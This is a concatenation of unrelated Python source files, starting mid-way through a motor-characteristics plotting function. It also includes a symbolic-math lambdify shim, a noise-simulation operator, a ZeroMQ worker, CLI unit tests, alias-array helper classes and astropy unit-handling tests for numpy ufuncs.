    axs[0, 0].legend(loc='center left')
    ax1 = axs[0, 0].twinx()
    ax1.plot(n, pmech, 'C1-', label='P mech')
    ax1.set_ylabel("Power / kW")
    ax1.legend(loc='lower center')

    axs[0, 1].plot(n[1:], np.array(char['u1'][1:]), 'C0-', label='Voltage')
    axs[0, 1].set_ylabel("Voltage / V",)
    axs[0, 1].grid()
    axs[0, 1].legend(loc='center left')
    ax2 = axs[0, 1].twinx()
    ax2.plot(n[1:], char['cosphi'][1:], 'C1-', label='Cos Phi')
    ax2.set_ylabel("Cos Phi")
    ax2.legend(loc='lower right')

    if 'id' in char:
        axs[1, 0].plot(n, np.array(char['id']), label='Id')
    if 'iq' in char:
        axs[1, 0].plot(n, np.array(char['iq']), label='Iq')
    axs[1, 0].plot(n, np.array(char['i1']), label='I1')
    axs[1, 0].set_xlabel("Speed / rpm")
    axs[1, 0].set_ylabel("Current / A")
    axs[1, 0].legend(loc='center left')
    if 'beta' in char:
        ax3 = axs[1, 0].twinx()
        ax3.plot(n, char['beta'], 'C3-', label='Beta')
        ax3.set_ylabel("Beta / °")
        ax3.legend(loc='center right')
    axs[1, 0].grid()

    plfe = np.array(char['plfe'])*1e-3
    plcu = np.array(char['plcu'])*1e-3
    pl = np.array(char['losses'])*1e-3
    axs[1, 1].plot(n, plcu, 'C0-', label='Cu Losses')
    axs[1, 1].plot(n, plfe, 'C1-', label='Fe Losses')
    axs[1, 1].set_ylabel("Losses / kW")
    axs[1, 1].legend(loc='center left')
    axs[1, 1].grid()
    axs[1, 1].set_xlabel("Speed / rpm")
    ax4 = axs[1, 1].twinx()
    ax4.plot(n[1:-1], char['eta'][1:-1], 'C3-', label="Eta")
    ax4.legend(loc='upper center')
    ax4.set_ylabel("Efficiency")

    fig.tight_layout()


if __name__ == "__main__":
    logging.basicConfig(level=logging.INFO,
                        format='%(asctime)s %(message)s')
    main()

# -*- coding: utf-8 -*-
from __future__ import (absolute_import, division, print_function)
from . import _wrap_numbers, Symbol, Number, Matrix


def symbols(s):
    """ mimics sympy.symbols """
    tup = tuple(map(Symbol, s.replace(',', ' ').split()))
    if len(tup) == 1:
        return tup[0]
    else:
        return tup


def symarray(prefix, shape):
    import numpy as np
    arr = np.empty(shape, dtype=object)
    for index in np.ndindex(shape):
        arr[index] = Symbol('%s_%s' % (
            prefix, '_'.join(map(str, index))))
    return arr


def lambdify(args, exprs):
    """
    lambdify mimics sympy.lambdify
    """
    try:
        nargs = len(args)
    except TypeError:
        args = (args,)
        nargs = 1
    try:
        nexprs = len(exprs)
    except TypeError:
        exprs = (exprs,)
        nexprs = 1

    @_wrap_numbers
    def f(*inp):
        if len(inp) != nargs:
            raise TypeError("Incorrect number of arguments")
        try:
            len(inp)
        except TypeError:
            inp = (inp,)
        subsd = dict(zip(args, inp))
        return [expr.subs(subsd).evalf() for expr in exprs][
            0 if nexprs == 1 else slice(None)]
    return f


class Lambdify(object):
    """
    Lambdify mimics symengine.Lambdify
    """

    def __init__(self, syms, exprs):
        self.syms = syms
        self.exprs = exprs

    def __call__(self, inp, out=None):
        inp = tuple(map(Number.make, inp))
        subsd = dict(zip(self.syms, inp))

        def _eval(expr_iter):
            return [expr.subs(subsd).evalf() for expr in expr_iter]
        exprs = self.exprs
        if out is not None:
            try:
                out.flat = _eval(exprs.flatten())
            except AttributeError:
                out.flat = _eval(exprs)
        elif isinstance(exprs, Matrix):
            import numpy as np
            nr, nc = exprs.nrows, exprs.ncols
            out = np.empty((nr, nc))
            for ri in range(nr):
                for ci in range(nc):
                    out[ri, ci] = exprs._get_element(
                        ri*nc + ci).subs(subsd).evalf()
            return out
            # return Matrix(nr, nc, _eval(exprs._get_element(i) for
            #                             i in range(nr*nc)))
        elif hasattr(exprs, 'reshape'):
            # NumPy like container:
            container = exprs.__class__(exprs.shape, dtype=float, order='C')
            container.flat = _eval(exprs.flatten())
            return container
        else:
            return _eval(exprs)

# Add your own choices here!

fruit = ["apples", "oranges", "pears", "grapes", "blueberries"]
lunch =  ["pho", "timmies", "thai", "burgers", "buffet!", "indian", "montanas"]
situations = {"fruit":fruit, "lunch":lunch}

# Copyright (c) 2015-2018 by the parties listed in the AUTHORS file.
# All rights reserved.  Use of this source code is governed by
# a BSD-style license that can be found in the LICENSE file.

"""
sim_det_noise.py implements the noise simulation operator, OpSimNoise.

"""

import numpy as np

from ..op import Operator

from ..ctoast import sim_noise_sim_noise_timestream as sim_noise_timestream
from .. import timing as timing


class OpSimNoise(Operator):
    """
    Operator which generates noise timestreams.

    This passes through each observation and every process generates data
    for its assigned samples.  The dictionary for each observation should
    include a unique 'ID' used in the random number generation.  The
    observation dictionary can optionally include a 'global_offset' member
    that might be useful if you are splitting observations and want to
    enforce reproducibility of a given sample, even when using
    different-sized observations.

    Args:
        out (str): accumulate data to the cache with name <out>_<detector>.
            If the named cache objects do not exist, then they are created.
        realization (int): if simulating multiple realizations, the realization
            index.
        component (int): the component index to use for this noise simulation.
        noise (str): PSD key in the observation dictionary.

    """

    def __init__(self, out='noise', realization=0, component=0, noise='noise',
                 rate=None, altFFT=False):

        # We call the parent class constructor, which currently does nothing
        super().__init__()

        self._out = out
        self._oversample = 2
        self._realization = realization
        self._component = component
        self._noisekey = noise
        self._rate = rate
        self._altfft = altFFT

    def exec(self, data):
        """
        Generate noise timestreams.

        This iterates over all observations and detectors and generates
        the noise timestreams based on the noise object for the current
        observation.

        Args:
            data (toast.Data): The distributed data.

        Raises:
            KeyError: If an observation in data does not have noise
                object defined under given key.
            RuntimeError: If observations are not split into chunks.

        """
        autotimer = timing.auto_timer(type(self).__name__)
        for obs in data.obs:
            obsindx = 0
            if 'id' in obs:
                obsindx = obs['id']
            else:
                print("Warning: observation ID is not set, using zero!")

            telescope = 0
            if 'telescope' in obs:
                telescope = obs['telescope_id']

            global_offset = 0
            if 'global_offset' in obs:
                global_offset = obs['global_offset']

            tod = obs['tod']
            if self._noisekey in obs:
                nse = obs[self._noisekey]
            else:
                raise KeyError('Observation does not contain noise under '
                               '"{}"'.format(self._noisekey))
            if tod.local_chunks is None:
                raise RuntimeError('noise simulation for uniform distributed '
                                   'samples not implemented')

            # eventually we'll redistribute, to allow long correlations...

            if self._rate is None:
                times = tod.local_times()
            else:
                times = None

            # Iterate over each chunk.

            chunk_first = tod.local_samples[0]
            for curchunk in range(tod.local_chunks[1]):
                chunk_first += self.simulate_chunk(
                    tod=tod, nse=nse,
                    curchunk=curchunk, chunk_first=chunk_first,
                    obsindx=obsindx, times=times,
                    telescope=telescope, global_offset=global_offset)

        return

    def simulate_chunk(self, *, tod, nse, curchunk, chunk_first,
                       obsindx, times, telescope, global_offset):
        """
        Simulate one chunk of noise for all detectors.

        Args:
            tod (toast.tod.TOD): TOD object for the observation.
            nse (toast.tod.Noise): Noise object for the observation.
            curchunk (int): The local index of the chunk to simulate.
            chunk_first (int): First global sample index of the chunk.
            obsindx (int): Observation index for random number stream.
            times (int): Timestamps for effective sample rate.
            telescope (int): Telescope index for random number stream.
            global_offset (int): Global offset for random number stream.

        Returns:
            chunk_samp (int): Number of simulated samples

        """
        autotimer = timing.auto_timer(type(self).__name__)
        chunk_samp = tod.total_chunks[tod.local_chunks[0] + curchunk]
        local_offset = chunk_first - tod.local_samples[0]

        if self._rate is None:
            # compute effective sample rate
            rate = 1 / np.median(np.diff(
                times[local_offset : local_offset+chunk_samp]))
        else:
            rate = self._rate

        for key in nse.keys:
            # Check if noise matching this PSD key is needed
            weight = 0.
            for det in tod.local_dets:
                weight += np.abs(nse.weight(det, key))
            if weight == 0:
                continue

            # Simulate the noise matching this key
            #nsedata = sim_noise_timestream(
            #    self._realization, telescope, self._component, obsindx,
            #    nse.index(key), rate, chunk_first+global_offset, chunk_samp,
            #    self._oversample, nse.freq(key), nse.psd(key),
            #    self._altfft)[0]

            nsedata = sim_noise_timestream(
                self._realization, telescope, self._component, obsindx,
                nse.index(key), rate, chunk_first+global_offset, chunk_samp,
                self._oversample, nse.freq(key), nse.psd(key))

            # Add the noise to all detectors that have nonzero weights
            for det in tod.local_dets:
                weight = nse.weight(det, key)
                if weight == 0:
                    continue
                cachename = '{}_{}'.format(self._out, det)
                if tod.cache.exists(cachename):
                    ref = tod.cache.reference(cachename)
                else:
                    ref = tod.cache.create(cachename, np.float64,
                                           (tod.local_samples[1], ))
                ref[local_offset : local_offset+chunk_samp] += weight*nsedata
                del ref

        return chunk_samp

#!/usr/bin/python 
# -*- coding: utf-8 -*-
#
# Copyright (c) 2013 ASMlover. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
#  * Redistributions of source code must retain the above copyright
#    notice, this list ofconditions and the following disclaimer.
#
#  * Redistributions in binary form must reproduce the above copyright
#    notice, this list of conditions and the following disclaimer in
#    the documentation and/or other materialsprovided with the
#    distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.

import zmq
import time


if __name__ == '__main__':
  ctx = zmq.Context()
  worker = ctx.socket(zmq.PULL)
  worker.connect('tcp://localhost:5555')

  sinker = ctx.socket(zmq.PUSH)
  sinker.connect('tcp://localhost:6666')

  print 'all workers are ready ...'
  while True:
    try:
      msg = worker.recv()

      print 'begin to work on task use `%s ms`' % msg
      time.sleep(int(msg) * 0.001)
      print '\tfinished this task'

      sinker.send('finished task which used `%s ms`' % msg)
    except KeyboardInterrupt:
      break

  sinker.close()
  worker.close()

from unittest import TestCase
import pkg_resources

from mock import patch

from click import UsageError
from click.testing import CliRunner


class TestCli(TestCase):

    @patch('molo.core.cookiecutter.cookiecutter')
    def test_scaffold(self, mock_cookiecutter):
        from molo.core.scripts import cli
        package = pkg_resources.get_distribution('molo.core')

        runner = CliRunner()
        runner.invoke(cli.scaffold, ['foo'])
        [call] = mock_cookiecutter.call_args_list
        args, kwargs = call
        self.assertTrue(kwargs['extra_context'].pop('secret_key'))
        self.assertEqual(kwargs, {
            'no_input': True,
            'extra_context': {
                'app_name': 'foo',
                'directory': 'foo',
                'author': 'Praekelt Foundation',
                'author_email': 'dev@praekelt.com',
                'url': None,
                'license': 'BSD',
                'molo_version': package.version,
                'require': (),
                'include': (),
            }
        })

    @patch('molo.core.cookiecutter.cookiecutter')
    def test_scaffold_with_custom_dir(self, mock_cookiecutter):
        from molo.core.scripts import cli
        package = pkg_resources.get_distribution('molo.core')

        runner = CliRunner()
        runner.invoke(cli.scaffold, ['foo', 'bar'])
        [call] = mock_cookiecutter.call_args_list
        args, kwargs = call
        self.assertTrue(kwargs['extra_context'].pop('secret_key'))
        self.assertEqual(kwargs, {
            'no_input': True,
            'extra_context': {
                'app_name': 'foo',
                'directory': 'bar',
                'author': 'Praekelt Foundation',
                'author_email': 'dev@praekelt.com',
                'url': None,
                'license': 'BSD',
                'molo_version': package.version,
                'require': (),
                'include': (),
            }
        })

    @patch('molo.core.cookiecutter.cookiecutter')
    def test_scaffold_with_requirements(self, mock_cookiecutter):
        from molo.core.scripts import cli
        package = pkg_resources.get_distribution('molo.core')

        runner = CliRunner()
        runner.invoke(cli.scaffold, ['foo', '--require', 'bar'])
        [call] = mock_cookiecutter.call_args_list
        args, kwargs = call
        self.assertTrue(kwargs['extra_context'].pop('secret_key'))
        self.assertEqual(kwargs, {
            'no_input': True,
            'extra_context': {
                'app_name': 'foo',
                'directory': 'foo',
                'author': 'Praekelt Foundation',
                'author_email': 'dev@praekelt.com',
                'url': None,
                'license': 'BSD',
                'molo_version': package.version,
                'require': ('bar',),
                'include': (),
            }
        })

    @patch('molo.core.cookiecutter.cookiecutter')
    def test_scaffold_with_includes(self, mock_cookiecutter):
        from molo.core.scripts import cli
        package = pkg_resources.get_distribution('molo.core')

        runner = CliRunner()
        runner.invoke(cli.scaffold, ['foo', '--include', 'bar', 'baz'])
        [call] = mock_cookiecutter.call_args_list
        args, kwargs = call
        self.assertTrue(kwargs['extra_context'].pop('secret_key'))
        self.assertEqual(kwargs, {
            'no_input': True,
            'extra_context': {
                'app_name': 'foo',
                'directory': 'foo',
                'author': 'Praekelt Foundation',
                'author_email': 'dev@praekelt.com',
                'url': None,
                'license': 'BSD',
                'molo_version': package.version,
                'require': (),
                'include': (('bar', 'baz'),),
            }
        })

    @patch('molo.core.scripts.cli.get_package')
    @patch('molo.core.scripts.cli.get_template_dirs')
    @patch('shutil.copytree')
    def test_unpack(self, mock_copytree, mock_get_template_dirs,
                    mock_get_package):
        package = pkg_resources.get_distribution('molo.core')
        mock_get_package.return_value = package
        mock_get_template_dirs.return_value = ['foo']
        mock_copytree.return_value = True

        from molo.core.scripts import cli
        runner = CliRunner()
        runner.invoke(cli.unpack_templates, ['app1', 'app2'])

        mock_copytree.assert_called_with(
            pkg_resources.resource_filename('molo.core', 'templates/foo'),
            pkg_resources.resource_filename('molo.core', 'templates/foo'))

    def test_get_package(self):
        from molo.core.scripts.cli import get_package
        self.assertRaisesRegexp(
            UsageError, 'molo.foo is not installed.', get_package, 'molo.foo')

import numpy as np
from scipy.sparse import csr_matrix


class AliasArray(np.ndarray):
    """An ndarray with a mapping of values to user-friendly names -- see example

    This ndarray subclass enables comparing sub_id and hop_id arrays directly with
    their friendly string identifiers. The mapping parameter translates sublattice
    or hopping names into their number IDs.

    Only the `==` and `!=` operators are overloaded to handle the aliases.

    Examples
    --------
    >>> a = AliasArray([0, 1, 0], mapping={"A": 0, "B": 1})
    >>> list(a == 0)
    [True, False, True]
    >>> list(a == "A")
    [True, False, True]
    >>> list(a != "A")
    [False, True, False]
    >>> a = AliasArray([0, 1, 0, 2], mapping={"A|1": 0, "B": 1, "A|2": 2})
    >>> list(a == "A")
    [True, False, True, True]
    >>> list(a != "A")
    [False, True, False, False]
    """
    def __new__(cls, array, mapping):
        obj = np.asarray(array).view(cls)
        obj.mapping = {SplitName(k): v for k, v in mapping.items()}
        return obj

    def __array_finalize__(self, obj):
        if obj is None:
            return
        self.mapping = getattr(obj, "mapping", None)

    def _mapped_eq(self, other):
        if other in self.mapping:
            return super().__eq__(self.mapping[other])
        else:
            result = np.zeros(len(self), dtype=np.bool)
            for k, v in self.mapping.items():
                if k == other:
                    result = np.logical_or(result, super().__eq__(v))
            return result

    def __eq__(self, other):
        if isinstance(other, str):
            return self._mapped_eq(other)
        else:
            return super().__eq__(other)

    def __ne__(self, other):
        if isinstance(other, str):
            return np.logical_not(self._mapped_eq(other))
        else:
            return super().__ne__(other)


# noinspection PyAbstractClass
class AliasCSRMatrix(csr_matrix):
    """Same as :class:`AliasArray` but for a CSR matrix

    Examples
    --------
    >>> from scipy.sparse import spdiags
    >>> m = AliasCSRMatrix(spdiags([1, 2, 1], [0], 3, 3), mapping={'A': 1, 'B': 2})
    >>> list(m.data == 'A')
    [True, False, True]
    >>> list(m.tocoo().data == 'A')
    [True, False, True]
    >>> list(m[:2].data == 'A')
    [True, False]
    """
    def __init__(self, *args, **kwargs):
        mapping = kwargs.pop('mapping', {})
        if not mapping:
            mapping = getattr(args[0], 'mapping', {})

        super().__init__(*args, **kwargs)
        self.data = AliasArray(self.data, mapping)

    @property
    def format(self):
        return 'csr'

    @format.setter
    def format(self, _):
        pass

    @property
    def mapping(self):
        return self.data.mapping

    def tocoo(self, *args, **kwargs):
        coo = super().tocoo(*args, **kwargs)
        coo.data = AliasArray(coo.data, mapping=self.mapping)
        return coo

    def __getitem__(self, item):
        result = super().__getitem__(item)
        if getattr(result, 'format', '') == 'csr':
            return AliasCSRMatrix(result, mapping=self.mapping)
        else:
            return result


class AliasIndex:
    """An all-or-nothing array index based on equality with a specific value

    The `==` and `!=` operators are overloaded to return a lazy array which is either
    all `True` or all `False`. See the examples below. This is useful for modifiers
    where the each call gets arrays with the same sub_id/hop_id for all elements.
    Instead of passing an `AliasArray` with `.size` identical element, `AliasIndex`
    does the same all-or-nothing indexing.

    Examples
    --------
    >>> l = np.array([1, 2, 3])
    >>> ai = AliasIndex("A", len(l))
    >>> list(l[ai == "A"])
    [1, 2, 3]
    >>> list(l[ai == "B"])
    []
    >>> list(l[ai != "A"])
    []
    >>> list(l[ai != "B"])
    [1, 2, 3]
    >>> np.logical_and([True, False, True], ai == "A")
    array([ True, False,  True], dtype=bool)
    >>> np.logical_and([True, False, True], ai != "A")
    array([False, False, False], dtype=bool)
    >>> bool(ai == "A")
    True
    >>> bool(ai != "A")
    False
    >>> str(ai)
    'A'
    >>> hash(ai) == hash("A")
    True
    >>> int(ai.eye)
    1
    >>> np.allclose(AliasIndex("A", 1, (2, 2)).eye, np.eye(2))
    True
    """
    class LazyArray:
        def __init__(self, value, shape):
            self.value = value
            self.shape = shape

        def __bool__(self):
            return bool(self.value)

        def __array__(self):
            return np.full(self.shape, self.value)

    def __init__(self, name, shape, orbs=(1, 1)):
        self.name = name
        self.shape = shape
        self.orbs = orbs

    def __str__(self):
        return self.name

    def __eq__(self, other):
        return self.LazyArray(self.name == other, self.shape)

    def __ne__(self, other):
        return self.LazyArray(self.name != other, self.shape)

    def __hash__(self):
        return hash(self.name)

    @property
    def eye(self):
        return np.eye(*self.orbs)


class SplitName(str):
    """String subclass with special support for strings of the form "first|second"

    Operators `==` and `!=` are overloaded to return `True` even if only the first part matches.

    Examples
    --------
    >>> s = SplitName("first|second")
    >>> s == "first|second"
    True
    >>> s != "first|second"
    False
    >>> s == "first"
    True
    >>> s != "first"
    False
    >>> s == "second"
    False
    >>> s != "second"
    True
    """
    @property
    def first(self):
        return self.split("|")[0]

    def __eq__(self, other):
        return super().__eq__(other) or self.first == other

    def __ne__(self, other):
        return super().__ne__(other) and self.first != other

    def __hash__(self):
        return super().__hash__()

# The purpose of these tests are to ensure that calling ufuncs with quantities
# returns quantities with the right units, or raises exceptions.

import warnings

import pytest
import numpy as np
from numpy.testing.utils import assert_allclose

from ... import units as u
from ...tests.helper import raises
from ...extern.six.moves import zip
from ...utils.compat import NUMPY_LT_1_13


class TestUfuncCoverage(object):
    """Test that we cover all ufunc's"""

    def test_coverage(self):
        all_np_ufuncs = set([ufunc for ufunc in np.core.umath.__dict__.values()
                             if type(ufunc) == np.ufunc])

        from .. import quantity_helper as qh

        all_q_ufuncs = (qh.UNSUPPORTED_UFUNCS |
                        set(qh.UFUNC_HELPERS.keys()))

        assert all_np_ufuncs - all_q_ufuncs == set([])
        assert all_q_ufuncs - all_np_ufuncs == set([])


class TestQuantityTrigonometricFuncs(object):
    """
    Test trigonometric functions
    """

    def test_sin_scalar(self):
        q = np.sin(30. * u.degree)
        assert q.unit == u.dimensionless_unscaled
        assert_allclose(q.value, 0.5)

    def test_sin_array(self):
        q = np.sin(np.array([0., np.pi / 4., np.pi / 2.]) * u.radian)
        assert q.unit == u.dimensionless_unscaled
        assert_allclose(q.value,
                        np.array([0., 1. / np.sqrt(2.), 1.]), atol=1.e-15)

    def test_arcsin_scalar(self):
        q1 = 30. * u.degree
        q2 = np.arcsin(np.sin(q1)).to(q1.unit)
        assert_allclose(q1.value, q2.value)

    def test_arcsin_array(self):
        q1 = np.array([0., np.pi / 4., np.pi / 2.]) * u.radian
        q2 = np.arcsin(np.sin(q1)).to(q1.unit)
        assert_allclose(q1.value, q2.value)

    def test_sin_invalid_units(self):
        with pytest.raises(TypeError) as exc:
            np.sin(3. * u.m)
        assert exc.value.args[0] == ("Can only apply 'sin' function "
                                     "to quantities with angle units")

    def test_arcsin_invalid_units(self):
        with pytest.raises(TypeError) as exc:
            np.arcsin(3. * u.m)
        assert exc.value.args[0] == ("Can only apply 'arcsin' function to "
                                     "dimensionless quantities")

    def test_arcsin_no_warning_on_unscaled_quantity(self):
        a = 15 * u.kpc
        b = 27 * u.pc

        with warnings.catch_warnings():
            warnings.filterwarnings('error')
            np.arcsin(b/a)

    def test_cos_scalar(self):
        q = np.cos(np.pi / 3. * u.radian)
        assert q.unit == u.dimensionless_unscaled
        assert_allclose(q.value, 0.5)

    def test_cos_array(self):
        q = np.cos(np.array([0., np.pi / 4., np.pi / 2.]) * u.radian)
        assert q.unit == u.dimensionless_unscaled
        assert_allclose(q.value,
                        np.array([1., 1. / np.sqrt(2.), 0.]), atol=1.e-15)

    def test_arccos_scalar(self):
        q1 = np.pi / 3. * u.radian
        q2 = np.arccos(np.cos(q1)).to(q1.unit)
        assert_allclose(q1.value, q2.value)

    def test_arccos_array(self):
        q1 = np.array([0., np.pi / 4., np.pi / 2.]) * u.radian
        q2 = np.arccos(np.cos(q1)).to(q1.unit)
        assert_allclose(q1.value, q2.value)

    def test_cos_invalid_units(self):
        with pytest.raises(TypeError) as exc:
            np.cos(3. * u.s)
        assert exc.value.args[0] == ("Can only apply 'cos' function "
                                     "to quantities with angle units")

    def test_arccos_invalid_units(self):
        with pytest.raises(TypeError) as exc:
            np.arccos(3. * u.s)
        assert exc.value.args[0] == ("Can only apply 'arccos' function to "
                                     "dimensionless quantities")

    def test_tan_scalar(self):
        q = np.tan(np.pi / 3. * u.radian)
        assert q.unit == u.dimensionless_unscaled
        assert_allclose(q.value, np.sqrt(3.))

    def test_tan_array(self):
        q = np.tan(np.array([0., 45., 135., 180.]) * u.degree)
        assert q.unit == u.dimensionless_unscaled
        assert_allclose(q.value,
                        np.array([0., 1., -1., 0.]), atol=1.e-15)

    def test_arctan_scalar(self):
        q = np.pi / 3. * u.radian
        assert np.arctan(np.tan(q))

    def test_arctan_array(self):
        q = np.array([10., 30., 70., 80.]) * u.degree
        assert_allclose(np.arctan(np.tan(q)).to_value(q.unit), q.value)

    def test_tan_invalid_units(self):
        with pytest.raises(TypeError) as exc:
            np.tan(np.array([1, 2, 3]) * u.N)
        assert exc.value.args[0] == ("Can only apply 'tan' function "
                                     "to quantities with angle units")

    def test_arctan_invalid_units(self):
        with pytest.raises(TypeError) as exc:
            np.arctan(np.array([1, 2, 3]) * u.N)
        assert exc.value.args[0] == ("Can only apply 'arctan' function to "
                                     "dimensionless quantities")

    def test_arctan2_valid(self):
        q1 = np.array([10., 30., 70., 80.]) * u.m
        q2 = 2.0 * u.km
        assert np.arctan2(q1, q2).unit == u.radian
        assert_allclose(np.arctan2(q1, q2).value,
                        np.arctan2(q1.value, q2.to_value(q1.unit)))
        q3 = q1 / q2
        q4 = 1.
        at2 = np.arctan2(q3, q4)
        assert_allclose(at2.value, np.arctan2(q3.to_value(1), q4))

    def test_arctan2_invalid(self):
        with pytest.raises(u.UnitsError) as exc:
            np.arctan2(np.array([1, 2, 3]) * u.N, 1. * u.s)
        assert "compatible dimensions" in exc.value.args[0]
        with pytest.raises(u.UnitsError) as exc:
            np.arctan2(np.array([1, 2, 3]) * u.N, 1.)
        assert "dimensionless quantities when other arg" in exc.value.args[0]

    def test_radians(self):

        q1 = np.deg2rad(180. * u.degree)
        assert_allclose(q1.value, np.pi)
        assert q1.unit == u.radian

        q2 = np.radians(180. * u.degree)
        assert_allclose(q2.value, np.pi)
        assert q2.unit == u.radian

        # the following doesn't make much sense in terms of the name of the
        # routine, but we check it gives the correct result.
        q3 = np.deg2rad(3. * u.radian)
        assert_allclose(q3.value, 3.)
        assert q3.unit == u.radian

        q4 = np.radians(3. * u.radian)
        assert_allclose(q4.value, 3.)
        assert q4.unit == u.radian

        with pytest.raises(TypeError):
            np.deg2rad(3. * u.m)

        with pytest.raises(TypeError):
            np.radians(3. * u.m)

    def test_degrees(self):

        # the following doesn't make much sense in terms of the name of the
        # routine, but we check it gives the correct result.
        q1 = np.rad2deg(60. * u.degree)
        assert_allclose(q1.value, 60.)
        assert q1.unit == u.degree

        q2 = np.degrees(60. * u.degree)
        assert_allclose(q2.value, 60.)
        assert q2.unit == u.degree

        q3 = np.rad2deg(np.pi * u.radian)
        assert_allclose(q3.value, 180.)
        assert q3.unit == u.degree

        q4 = np.degrees(np.pi * u.radian)
        assert_allclose(q4.value, 180.)
        assert q4.unit == u.degree

        with pytest.raises(TypeError):
            np.rad2deg(3. * u.m)

        with pytest.raises(TypeError):
            np.degrees(3. * u.m)


class TestQuantityMathFuncs(object):
    """
    Test other mathematical functions
    """

    def test_multiply_scalar(self):
        assert np.multiply(4. * u.m, 2. / u.s) == 8. * u.m / u.s
        assert np.multiply(4. * u.m, 2.) == 8. * u.m
        assert np.multiply(4., 2. / u.s) == 8. / u.s

    def test_multiply_array(self):
        assert np.all(np.multiply(np.arange(3.) * u.m, 2. / u.s) ==
                      np.arange(0, 6., 2.) * u.m / u.s)

    @pytest.mark.parametrize('function', (np.divide, np.true_divide))
    def test_divide_scalar(self, function):
        assert function(4. * u.m, 2. * u.s) == function(4., 2.) * u.m / u.s
        assert function(4. * u.m, 2.) == function(4., 2.) * u.m
        assert function(4., 2. * u.s) == function(4., 2.) / u.s

    @pytest.mark.parametrize('function', (np.divide, np.true_divide))
    def test_divide_array(self, function):
        assert np.all(function(np.arange(3.) * u.m, 2. * u.s) ==
                      function(np.arange(3.), 2.) * u.m / u.s)

    def test_floor_divide_remainder_and_divmod(self):
        inch = u.Unit(0.0254 * u.m)
        dividend = np.array([1., 2., 3.]) * u.m
        divisor = np.array([3., 4., 5.]) * inch
        quotient = dividend // divisor
        remainder = dividend % divisor
        assert_allclose(quotient.value, [13., 19., 23.])
        assert quotient.unit == u.dimensionless_unscaled
        assert_allclose(remainder.value, [0.0094, 0.0696, 0.079])
        assert remainder.unit == dividend.unit
        quotient2 = np.floor_divide(dividend, divisor)
        remainder2 = np.remainder(dividend, divisor)
        assert np.all(quotient2 == quotient)
        assert np.all(remainder2 == remainder)
        quotient3, remainder3 = divmod(dividend, divisor)
        assert np.all(quotient3 == quotient)
        assert np.all(remainder3 == remainder)

        with pytest.raises(TypeError):
            divmod(dividend, u.km)

        with pytest.raises(TypeError):
            dividend // u.km

        with pytest.raises(TypeError):
            dividend % u.km

        if hasattr(np, 'divmod'):  # not NUMPY_LT_1_13
            quotient4, remainder4 = np.divmod(dividend, divisor)
            assert np.all(quotient4 == quotient)
            assert np.all(remainder4 == remainder)
            with pytest.raises(TypeError):
                np.divmod(dividend, u.km)

    def test_sqrt_scalar(self):
        assert np.sqrt(4. * u.m) == 2. * u.m ** 0.5

    def test_sqrt_array(self):
        assert np.all(np.sqrt(np.array([1., 4., 9.]) * u.m)
                      == np.array([1., 2., 3.]) * u.m ** 0.5)

    def test_square_scalar(self):
        assert np.square(4. * u.m) == 16. * u.m ** 2

    def test_square_array(self):
        assert np.all(np.square(np.array([1., 2., 3.]) * u.m)
                      == np.array([1., 4., 9.]) * u.m ** 2)

    def test_reciprocal_scalar(self):
        assert np.reciprocal(4. * u.m) == 0.25 / u.m

    def test_reciprocal_array(self):
        assert np.all(np.reciprocal(np.array([1., 2., 4.]) * u.m)
                      == np.array([1., 0.5, 0.25]) / u.m)

    # cbrt only introduced in numpy 1.10
    # heaviside only introduced in numpy 1.13
    @pytest.mark.skipif("not hasattr(np, 'heaviside')")
    def test_heaviside_scalar(self):
        assert np.heaviside(0. * u.m, 0.5) == 0.5 * u.dimensionless_unscaled
        assert np.heaviside(0. * u.s,
                            25 * u.percent) == 0.25 * u.dimensionless_unscaled
        assert np.heaviside(2. * u.J, 0.25) == 1. * u.dimensionless_unscaled

    @pytest.mark.skipif("not hasattr(np, 'heaviside')")
    def test_heaviside_array(self):
        values = np.array([-1., 0., 0., +1.])
        halfway = np.array([0.75, 0.25, 0.75, 0.25]) * u.dimensionless_unscaled
        assert np.all(np.heaviside(values * u.m,
                                   halfway * u.dimensionless_unscaled) ==
                      [0, 0.25, 0.75, +1.] * u.dimensionless_unscaled)

    @pytest.mark.skipif("not hasattr(np, 'cbrt')")
    def test_cbrt_scalar(self):
        assert np.cbrt(8. * u.m**3) == 2. * u.m

    @pytest.mark.skipif("not hasattr(np, 'cbrt')")
    def test_cbrt_array(self):
        # Calculate cbrt on both sides since on Windows the cube root of 64
        # does not exactly equal 4.  See 4388.
        values = np.array([1., 8., 64.])
        assert np.all(np.cbrt(values * u.m**3) ==
                      np.cbrt(values) * u.m)

    def test_power_scalar(self):
        assert np.power(4. * u.m, 2.) == 16. * u.m ** 2
        assert np.power(4., 200. * u.cm / u.m) == \
            u.Quantity(16., u.dimensionless_unscaled)
        # regression check on #1696
        assert np.power(4. * u.m, 0.) == 1. * u.dimensionless_unscaled

    def test_power_array(self):
        assert np.all(np.power(np.array([1., 2., 3.]) * u.m, 3.)
                      == np.array([1., 8., 27.]) * u.m ** 3)
        # regression check on #1696
        assert np.all(np.power(np.arange(4.) * u.m, 0.) ==
                      1. * u.dimensionless_unscaled)

    # float_power only introduced in numpy 1.12
    @pytest.mark.skipif("not hasattr(np, 'float_power')")
    def test_float_power_array(self):
        assert np.all(np.float_power(np.array([1., 2., 3.]) * u.m, 3.)
                      == np.array([1., 8., 27.]) * u.m ** 3)
        # regression check on #1696
        assert np.all(np.float_power(np.arange(4.) * u.m, 0.) ==
                      1. * u.dimensionless_unscaled)

